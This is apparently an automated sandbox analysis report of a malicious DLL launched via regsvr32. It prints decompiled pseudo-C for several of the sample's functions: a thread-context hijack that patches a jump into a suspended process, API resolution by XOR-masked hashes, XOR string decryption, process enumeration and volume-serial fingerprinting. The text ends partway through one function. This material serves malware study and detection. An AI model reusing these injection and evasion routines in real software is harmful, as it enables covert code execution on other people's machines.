            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: 4a2139b8098c13373e5124f409f867e7c16d3852b704ebd5c3fc207008b6b30b
            • Instruction ID: a5bcc98587625b64f36ca13cdfe6939e6b256afb60845d6847b576f6e3fa6b34
            • Opcode Fuzzy Hash: 4a2139b8098c13373e5124f409f867e7c16d3852b704ebd5c3fc207008b6b30b
            • Instruction Fuzzy Hash: 57915279700705AFD708EBB4D848FEAB7F8BF4C300F084169E519DB285DB706A658BA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316D9DE Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 143 316d9de-316d9f7 call 316d309 146 316dad0-316dadb call 316d47c 143->146 147 316d9fd-316da0b call 316d538 143->147 147->146 152 316da11-316da48 call 3168f63 GetThreadContext 147->152 152->146 155 316da4e-316da8e NtProtectVirtualMemory 152->155 156 316da90-316daab NtWriteVirtualMemory 155->156 157 316dace 155->157 156->157 158 316daad-316dacc NtProtectVirtualMemory 156->158 157->146 158->146 158->157
            C-Code - Quality: 100%
            			E0316D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E0316D309(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E0316D538( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E03168F63( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E0316D47C();
				return _t66;
			}



















            0x0316d9ea
            0x0316d9ec
            0x0316d9ee
            0x0316d9f7
            0x0316da02
            0x0316da07
            0x0316da0b
            0x0316da1f
            0x0316da27
            0x0316da48
            0x0316da4e
            0x0316da56
            0x0316da64
            0x0316da6a
            0x0316da6b
            0x0316da77
            0x0316da7e
            0x0316da8e
            0x0316dace
            0x0316dace
            0x0316daad
            0x0316daad
            0x0316dacc
            0x00000000
            0x00000000
            0x0316dacc
            0x0316da8e
            0x0316da48
            0x0316da0b
            0x0316dad0
            0x0316dadb

            APIs
              • Part of subcall function 0316D309: LoadLibraryW.KERNEL32 ref: 0316D403
              • Part of subcall function 0316D538: NtCreateSection.NTDLL(0316DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0316D5AA
              • Part of subcall function 0316D538: RegisterClassExA.USER32(?), ref: 0316D5FE
              • Part of subcall function 0316D538: CreateWindowExA.USER32 ref: 0316D629
              • Part of subcall function 0316D538: DestroyWindow.USER32(00000000), ref: 0316D634
              • Part of subcall function 0316D538: UnregisterClassA.USER32 ref: 0316D63F
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0316DA40
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0316DA89
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0316DAA6
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0316DAC7
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: b48efcb7cb31fdadc3fcbed3863b49f3fffc844f85ec89ce0a14b9d06f6e1802
            • Instruction ID: 1f6860eba5a74a88766d61062083adaf1f1cfc70e6eb975a2b8d27ba07f345ff
            • Opcode Fuzzy Hash: b48efcb7cb31fdadc3fcbed3863b49f3fffc844f85ec89ce0a14b9d06f6e1802
            • Instruction Fuzzy Hash: 04314F76A0010AAFDB11DFA9DD44FEEFBBCEF08210F1441A6A505E7154D730EA55CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316EF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 179 316ef38-316ef4f 180 316ef51-316ef79 179->180 181 316efac 179->181 180->181 182 316ef7b-316ef9e call 316a5d0 call 316e34a 180->182 183 316efae-316efb2 181->183 188 316efb3-316efca 182->188 189 316efa0-316efaa 182->189 190 316f020-316f022 188->190 191 316efcc-316efd4 188->191 189->181 189->182 190->183 191->190 192 316efd6 191->192 193 316efd8-316efde 192->193 194 316efe0-316efe2 193->194 195 316efee-316efff 193->195 194->195 196 316efe4-316efec 194->196 197 316f004-316f010 LoadLibraryA 195->197 198 316f001-316f002 195->198 196->193 196->195 197->181 199 316f012-316f01c GetProcAddress 197->199 198->197 199->181 200 316f01e 199->200 200->183
            C-Code - Quality: 100%
            			E0316EF38(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0316E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0316A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























            0x0316ef41
            0x0316ef43
            0x0316ef46
            0x0316ef49
            0x0316ef4f
            0x0316efac
            0x00000000
            0x0316efac
            0x0316ef51
            0x0316ef5c
            0x0316ef5f
            0x0316ef64
            0x0316ef69
            0x0316ef6c
            0x0316ef6e
            0x0316ef71
            0x0316ef74
            0x0316ef79
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316ef7b
            0x0316ef7b
            0x0316ef8d
            0x0316ef9a
            0x0316ef9e
            0x00000000
            0x00000000
            0x0316efa0
            0x0316efa3
            0x0316efa4
            0x0316efaa
            0x00000000
            0x00000000
            0x00000000
            0x0316efaa
            0x0316efc1
            0x0316efc6
            0x0316efca
            0x00000000
            0x0316efd6
            0x0316efd6
            0x0316efd8
            0x0316efd8
            0x0316efde
            0x00000000
            0x00000000
            0x0316efe4
            0x0316efe8
            0x0316efec
            0x00000000
            0x00000000
            0x00000000
            0x0316efec
            0x0316eff2
            0x0316effa
            0x0316efff
            0x0316f002
            0x0316f002
            0x0316f004
            0x0316f008
            0x0316f010
            0x00000000
            0x00000000
            0x0316f014
            0x0316f01c
            0x00000000
            0x00000000
            0x00000000
            0x0316f01c

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0316F008
            • GetProcAddress.KERNEL32(00000000,?), ref: 0316F014
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: 77b7fc34a80a278c65e0b7e8d3314ff8af54e8aea0af4a0f7712ff0ad7aede22
            • Instruction ID: 116a4a16b1c10b492c4c2097a1829ec2f4b1223ea29f30b37d32837c541e29ca
            • Opcode Fuzzy Hash: 77b7fc34a80a278c65e0b7e8d3314ff8af54e8aea0af4a0f7712ff0ad7aede22
            • Instruction Fuzzy Hash: 8A31E639A002159BCB14CFADD980BAEFBF9AF48244F2845A9D805DB341D730D9A1C7A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316BAF6 Relevance: 4.6, APIs: 3, Instructions: 66processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 221 316baf6-316bb1e CreateToolhelp32Snapshot 222 316bb20-316bb49 call 3168f63 Process32First 221->222 223 316bb8e-316bb94 221->223 226 316bb4b-316bb57 222->226 227 316bb59-316bb69 call 316daf2 222->227 226->223 230 316bb7e-316bb8b FindCloseChangeNotification 227->230 231 316bb6b-316bb7c 227->231 230->223 231->227 231->230
            C-Code - Quality: 72%
            			E0316BAF6(void* __ecx, void* __edx) {
				void* _v304;
				char _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t38;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E03168F63( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						while(1) {
							_t43 = _v312( &_v308, _t33);
							if(_t43 == 0) {
								break;
							}
							_t38 =  *0x317f8d0; // 0x4faf8c0
							_push( &_v308);
							_push(_t45);
							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x317f8d0; // 0x4faf8c0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}













            0x0316bb0e
            0x0316bb10
            0x0316bb14
            0x0316bb17
            0x0316bb19
            0x0316bb1e
            0x0316bb2d
            0x0316bb35
            0x0316bb49
            0x0316bb59
            0x0316bb63
            0x0316bb69
            0x00000000
            0x00000000
            0x0316bb6b
            0x0316bb75
            0x0316bb76
            0x0316bb7c
            0x00000000
            0x00000000
            0x00000000
            0x0316bb7c
            0x0316bb84
            0x0316bb8b
            0x0316bb4b
            0x0316bb4b
            0x0316bb51
            0x0316bb56
            0x0316bb56
            0x0316bb49
            0x0316bb94

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0316BB14
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • Process32First.KERNEL32(00000000,?), ref: 0316BB44
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0316BB84
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: 766d7ac6122ee7a5c79bcca52786acddcf9c49b720a3619b0abc64274f9aec17
            • Instruction ID: d70c63fa7eb81c96d3a904d8390dc131e1b4a8521a0179312d503ca417ea23af
            • Opcode Fuzzy Hash: 766d7ac6122ee7a5c79bcca52786acddcf9c49b720a3619b0abc64274f9aec17
            • Instruction Fuzzy Hash: DA1181721042019BC310EFA9A849E6B77ECEF8C260F19066DF524C7188EB20D5558762
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316C778 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 94%
            			E0316C778(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E03168F63(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x317f8d0; // 0x4faf8c0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E03169F85(_t44, 0x978);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E03168D9A( &_v16);
				_t33 = E0316A5E9(_t43);
				E03169FE4( &(_t43[E0316A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0316A5E9(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0316E34A(_t43, E0316A5E9(_t43) + _t40, 0);
			}
















            0x0316c778
            0x0316c781
            0x0316c78d
            0x0316c793
            0x0316c795
            0x0316c79d
            0x0316c7ab
            0x0316c7b0
            0x0316c7bf
            0x0316c7ca
            0x0316c7d7
            0x0316c7f1
            0x0316c7f6
            0x0316c7f8
            0x0316c7ff
            0x0316c80f
            0x0316c820
            0x0316c82a
            0x0316c832
            0x0316c839
            0x0316c83c
            0x0316c859

            APIs
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0316C7BF
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0316C7F1
              • Part of subcall function 03169FE4: _vsnwprintf.MSVCRT ref: 0316A001
            • lstrcatW.KERNEL32(?,00000114), ref: 0316C82A
            • CharUpperBuffW.USER32(?,00000000), ref: 0316C83C
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 2068924c1c371672f9295d9173e22605a04b32c498f6b4b648591d857ad4dd80
            • Instruction ID: a1bea7299a98a2a31240a4d3a98f1692cd96ae677b6da92b7b523c20a3751f6d
            • Opcode Fuzzy Hash: 2068924c1c371672f9295d9173e22605a04b32c498f6b4b648591d857ad4dd80
            • Instruction Fuzzy Hash: A72130B6A10314BFDB14EBE4DC49FAE77BCEF8C210F1041A5F605E6185EB749A548B60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03168BCD Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94stringCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 201 3168bcd-3168be2 202 3168be4-3168be7 201->202 203 3168c05 201->203 204 3168bee-3168bfe 202->204 205 3168c0a-3168c2a 203->205 206 3168c00-3168c03 204->206 207 3168c5d-3168c5f 204->207 208 3168c2c-3168c31 205->208 209 3168c3a-3168c3e 205->209 206->203 206->204 207->203 210 3168c61-3168c65 call 3168dc9 207->210 208->208 211 3168c33-3168c38 208->211 212 3168c40-3168c4a 209->212 213 3168c4c-3168c56 lstrlenW 209->213 216 3168c6a-3168c72 210->216 211->209 211->212 212->212 212->213 214 3168c58-3168c5c 213->214 217 3168c74-3168c79 216->217 218 3168c7b-3168c80 216->218 217->214 219 3168c82-3168c99 218->219 219->219 220 3168c9b-3168c9e 219->220 220->205
            C-Code - Quality: 80%
            			E03168BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				short _v44;
				void* _t38;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t64;
				signed int _t71;
				signed int _t74;
				void* _t76;
				void* _t77;

				_t71 = _a12;
				_t53 = __edx;
				_v8 = __ecx;
				_t74 = _t71;
				if(_t71 >= __edx) {
					L4:
					_t54 = 0x317f94e;
					L5:
					_t58 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t38 = 0;
					if(_v28 == 0) {
						L8:
						_t64 = _t38;
						if(_t64 == 0) {
							L10:
							lstrlenW( &_v44);
							return _t54;
						} else {
							goto L9;
						}
						do {
							L9:
							_t19 = _t58 + 0x30; // 0x30
							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
							_t58 = _t58 + 1;
						} while (_t58 < _t64);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t38 = _t38 + 1;
					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
					_t64 = 0xe;
					if(_t38 > _t64) {
						goto L9;
					}
					goto L8;
				}
				_t59 = _a4;
				_a12 = 0x5a;
				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
					_t74 = _t74 + 1;
					if(_t74 < _t53) {
						continue;
					}
					goto L4;
				}
				_t76 = _t74 - _t71;
				if(_t76 == 0) {
					goto L4;
				}
				_t47 = E03168DC9(_t76 + 1); // executed
				_t55 = _t47;
				_v12 = _t55;
				if(_t55 != 0) {
					_t56 = _a4;
					_t62 = _t55 - _t71;
					do {
						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
						_t71 = _t71 + 1;
						_t76 = _t76 - 1;
					} while (_t76 != 0);
					_t54 = _v12;
					goto L5;
				}
				return 0x317f94e;
			}





















            0x03168bd6
            0x03168bd9
            0x03168bdb
            0x03168bde
            0x03168be2
            0x03168c05
            0x03168c05
            0x03168c0a
            0x03168c14
            0x03168c16
            0x03168c17
            0x03168c18
            0x03168c19
            0x03168c1b
            0x03168c1f
            0x03168c20
            0x03168c21
            0x03168c22
            0x03168c24
            0x03168c25
            0x03168c2a
            0x03168c3a
            0x03168c3a
            0x03168c3e
            0x03168c4c
            0x03168c50
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x03168c40
            0x03168c40
            0x03168c40
            0x03168c43
            0x03168c47
            0x03168c48
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x03168c2c
            0x03168c2c
            0x03168c2c
            0x03168c2d
            0x03168c35
            0x03168c38
            0x00000000
            0x00000000
            0x00000000
            0x03168c38
            0x03168be4
            0x03168be7
            0x03168bee
            0x03168c00
            0x03168c03
            0x00000000
            0x00000000
            0x00000000
            0x03168c03
            0x03168c5d
            0x03168c5f
            0x00000000
            0x00000000
            0x03168c65
            0x03168c6a
            0x03168c6c
            0x03168c72
            0x03168c7d
            0x03168c80
            0x03168c82
            0x03168c92
            0x03168c95
            0x03168c96
            0x03168c96
            0x03168c9b
            0x00000000
            0x03168c9b
            0x00000000

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,0317CA88), ref: 03168C50
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: b97396ced3ae9316096a1218242f6a633122d2338aab083e97d0c3cac7b55aad
            • Instruction ID: 0f4113aba63d950dde0e66a9e16982072beb1d969048dc2180a00937f7e179ff
            • Opcode Fuzzy Hash: b97396ced3ae9316096a1218242f6a633122d2338aab083e97d0c3cac7b55aad
            • Instruction Fuzzy Hash: 58213531B016896FCB04CFECC8804EEBFB6BF8E210B2C4478E941AB201D731D9968790
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316C986 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 234 316c986-316c9a6 GetTokenInformation 235 316c9ec 234->235 236 316c9a8-316c9b1 GetLastError 234->236 237 316c9ee-316c9f2 235->237 236->235 238 316c9b3-316c9c3 call 3168dc9 236->238 241 316c9c5-316c9c7 238->241 242 316c9c9-316c9dc GetTokenInformation 238->242 241->237 242->235 243 316c9de-316c9ea call 3168ddf 242->243 243->241
            C-Code - Quality: 86%
            			E0316C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E03168DC9(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E03168DDF( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










            0x0316c989
            0x0316c98a
            0x0316c991
            0x0316c999
            0x0316c99d
            0x0316c9a6
            0x0316c9ec
            0x0316c9ec
            0x0316c9b3
            0x0316c9bb
            0x0316c9bd
            0x0316c9c3
            0x0316c9dc
            0x00000000
            0x0316c9de
            0x0316c9e3
            0x00000000
            0x0316c9e9
            0x0316c9c5
            0x0316c9c5
            0x0316c9c5
            0x0316c9c5
            0x0316c9c3
            0x0316c9f2

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,03160000,00000000,00000000,?,0316CA07,00000000,00000000,?,0316CA30), ref: 0316C9A1
            • GetLastError.KERNEL32(?,0316CA07,00000000,00000000,?,0316CA30,00001644,?,0316E053), ref: 0316C9A8
              • Part of subcall function 03168DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0316CA07,00000000,00000000,?,0316CA30,00001644,?,0316E053), ref: 0316C9D7
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: da49c706294079bea6c60e416f3ea7a1a20b874fc9323c48673f32ab09a17538
            • Instruction ID: f455c234c1ba450341d9615e037005ac6cb6effc6528fe49d3242369938ff457
            • Opcode Fuzzy Hash: da49c706294079bea6c60e416f3ea7a1a20b874fc9323c48673f32ab09a17538
            • Instruction Fuzzy Hash: 18018B76600214BF8B24ABE6EC49D9B7EACEE4D7A07150465F445D6101E730DDA08BF0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316BE10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 246 316be10-316be5f call 3168f63 * 2 CreateProcessW
            C-Code - Quality: 79%
            			E0316BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E03168F63(__edx, 0, 0x10);
				E03168F63( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





            0x0316be21
            0x0316be2e
            0x0316be36
            0x0316be52
            0x0316be58
            0x0316be5f

            APIs
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0316BE52
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: cbbb4fdfff018baa71e1113f83f3bc875c9ab5820eadd66d42a80c7e35c4d3d2
            • Instruction ID: 446dc1f54c52e8fd6c46de13dac812d253ba7373854626675f344916074bbe62
            • Opcode Fuzzy Hash: cbbb4fdfff018baa71e1113f83f3bc875c9ab5820eadd66d42a80c7e35c4d3d2
            • Instruction Fuzzy Hash: 53F065F16402187FF720E6A5CC0AFBF36ACDB85714F500165BB05EB1C0E6A0AD4582B5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316D889 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 251 316d889-316d8a9 call 316d7cd 254 316d8af-316d8ce call 316b6e3 251->254 255 316d9da-316d9dd 251->255 258 316d8d4-316d8d6 254->258 259 316d9ca-316d9d9 call 3168ddf 254->259 260 316d8dc-316d8de 258->260 261 316d9b8-316d9c8 call 3168ddf 258->261 259->255 264 316d8e1-316d8e3 260->264 261->259 266 316d9a6-316d9b2 264->266 267 316d8e9-316d908 call 3168f63 call 316be10 264->267 266->258 266->261 273 316d96a-316d96e 267->273 274 316d90a-316d91d call 316d9de 267->274 275 316d970-316d972 273->275 276 316d999-316d9a0 273->276 274->273 281 316d91f-316d937 274->281 278 316d974-316d97a 275->278 279 316d983-316d993 275->279 276->264 276->266 278->279 279->276 284 316d967 281->284 285 316d939-316d94e GetLastError call 316dadc 281->285 284->273 288 316d963-316d964 FindCloseChangeNotification 285->288 289 316d950-316d95b 285->289 288->284 291 316d95e 289->291 292 316d95d 289->292 291->288 292->291
            C-Code - Quality: 96%
            			E0316D889(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
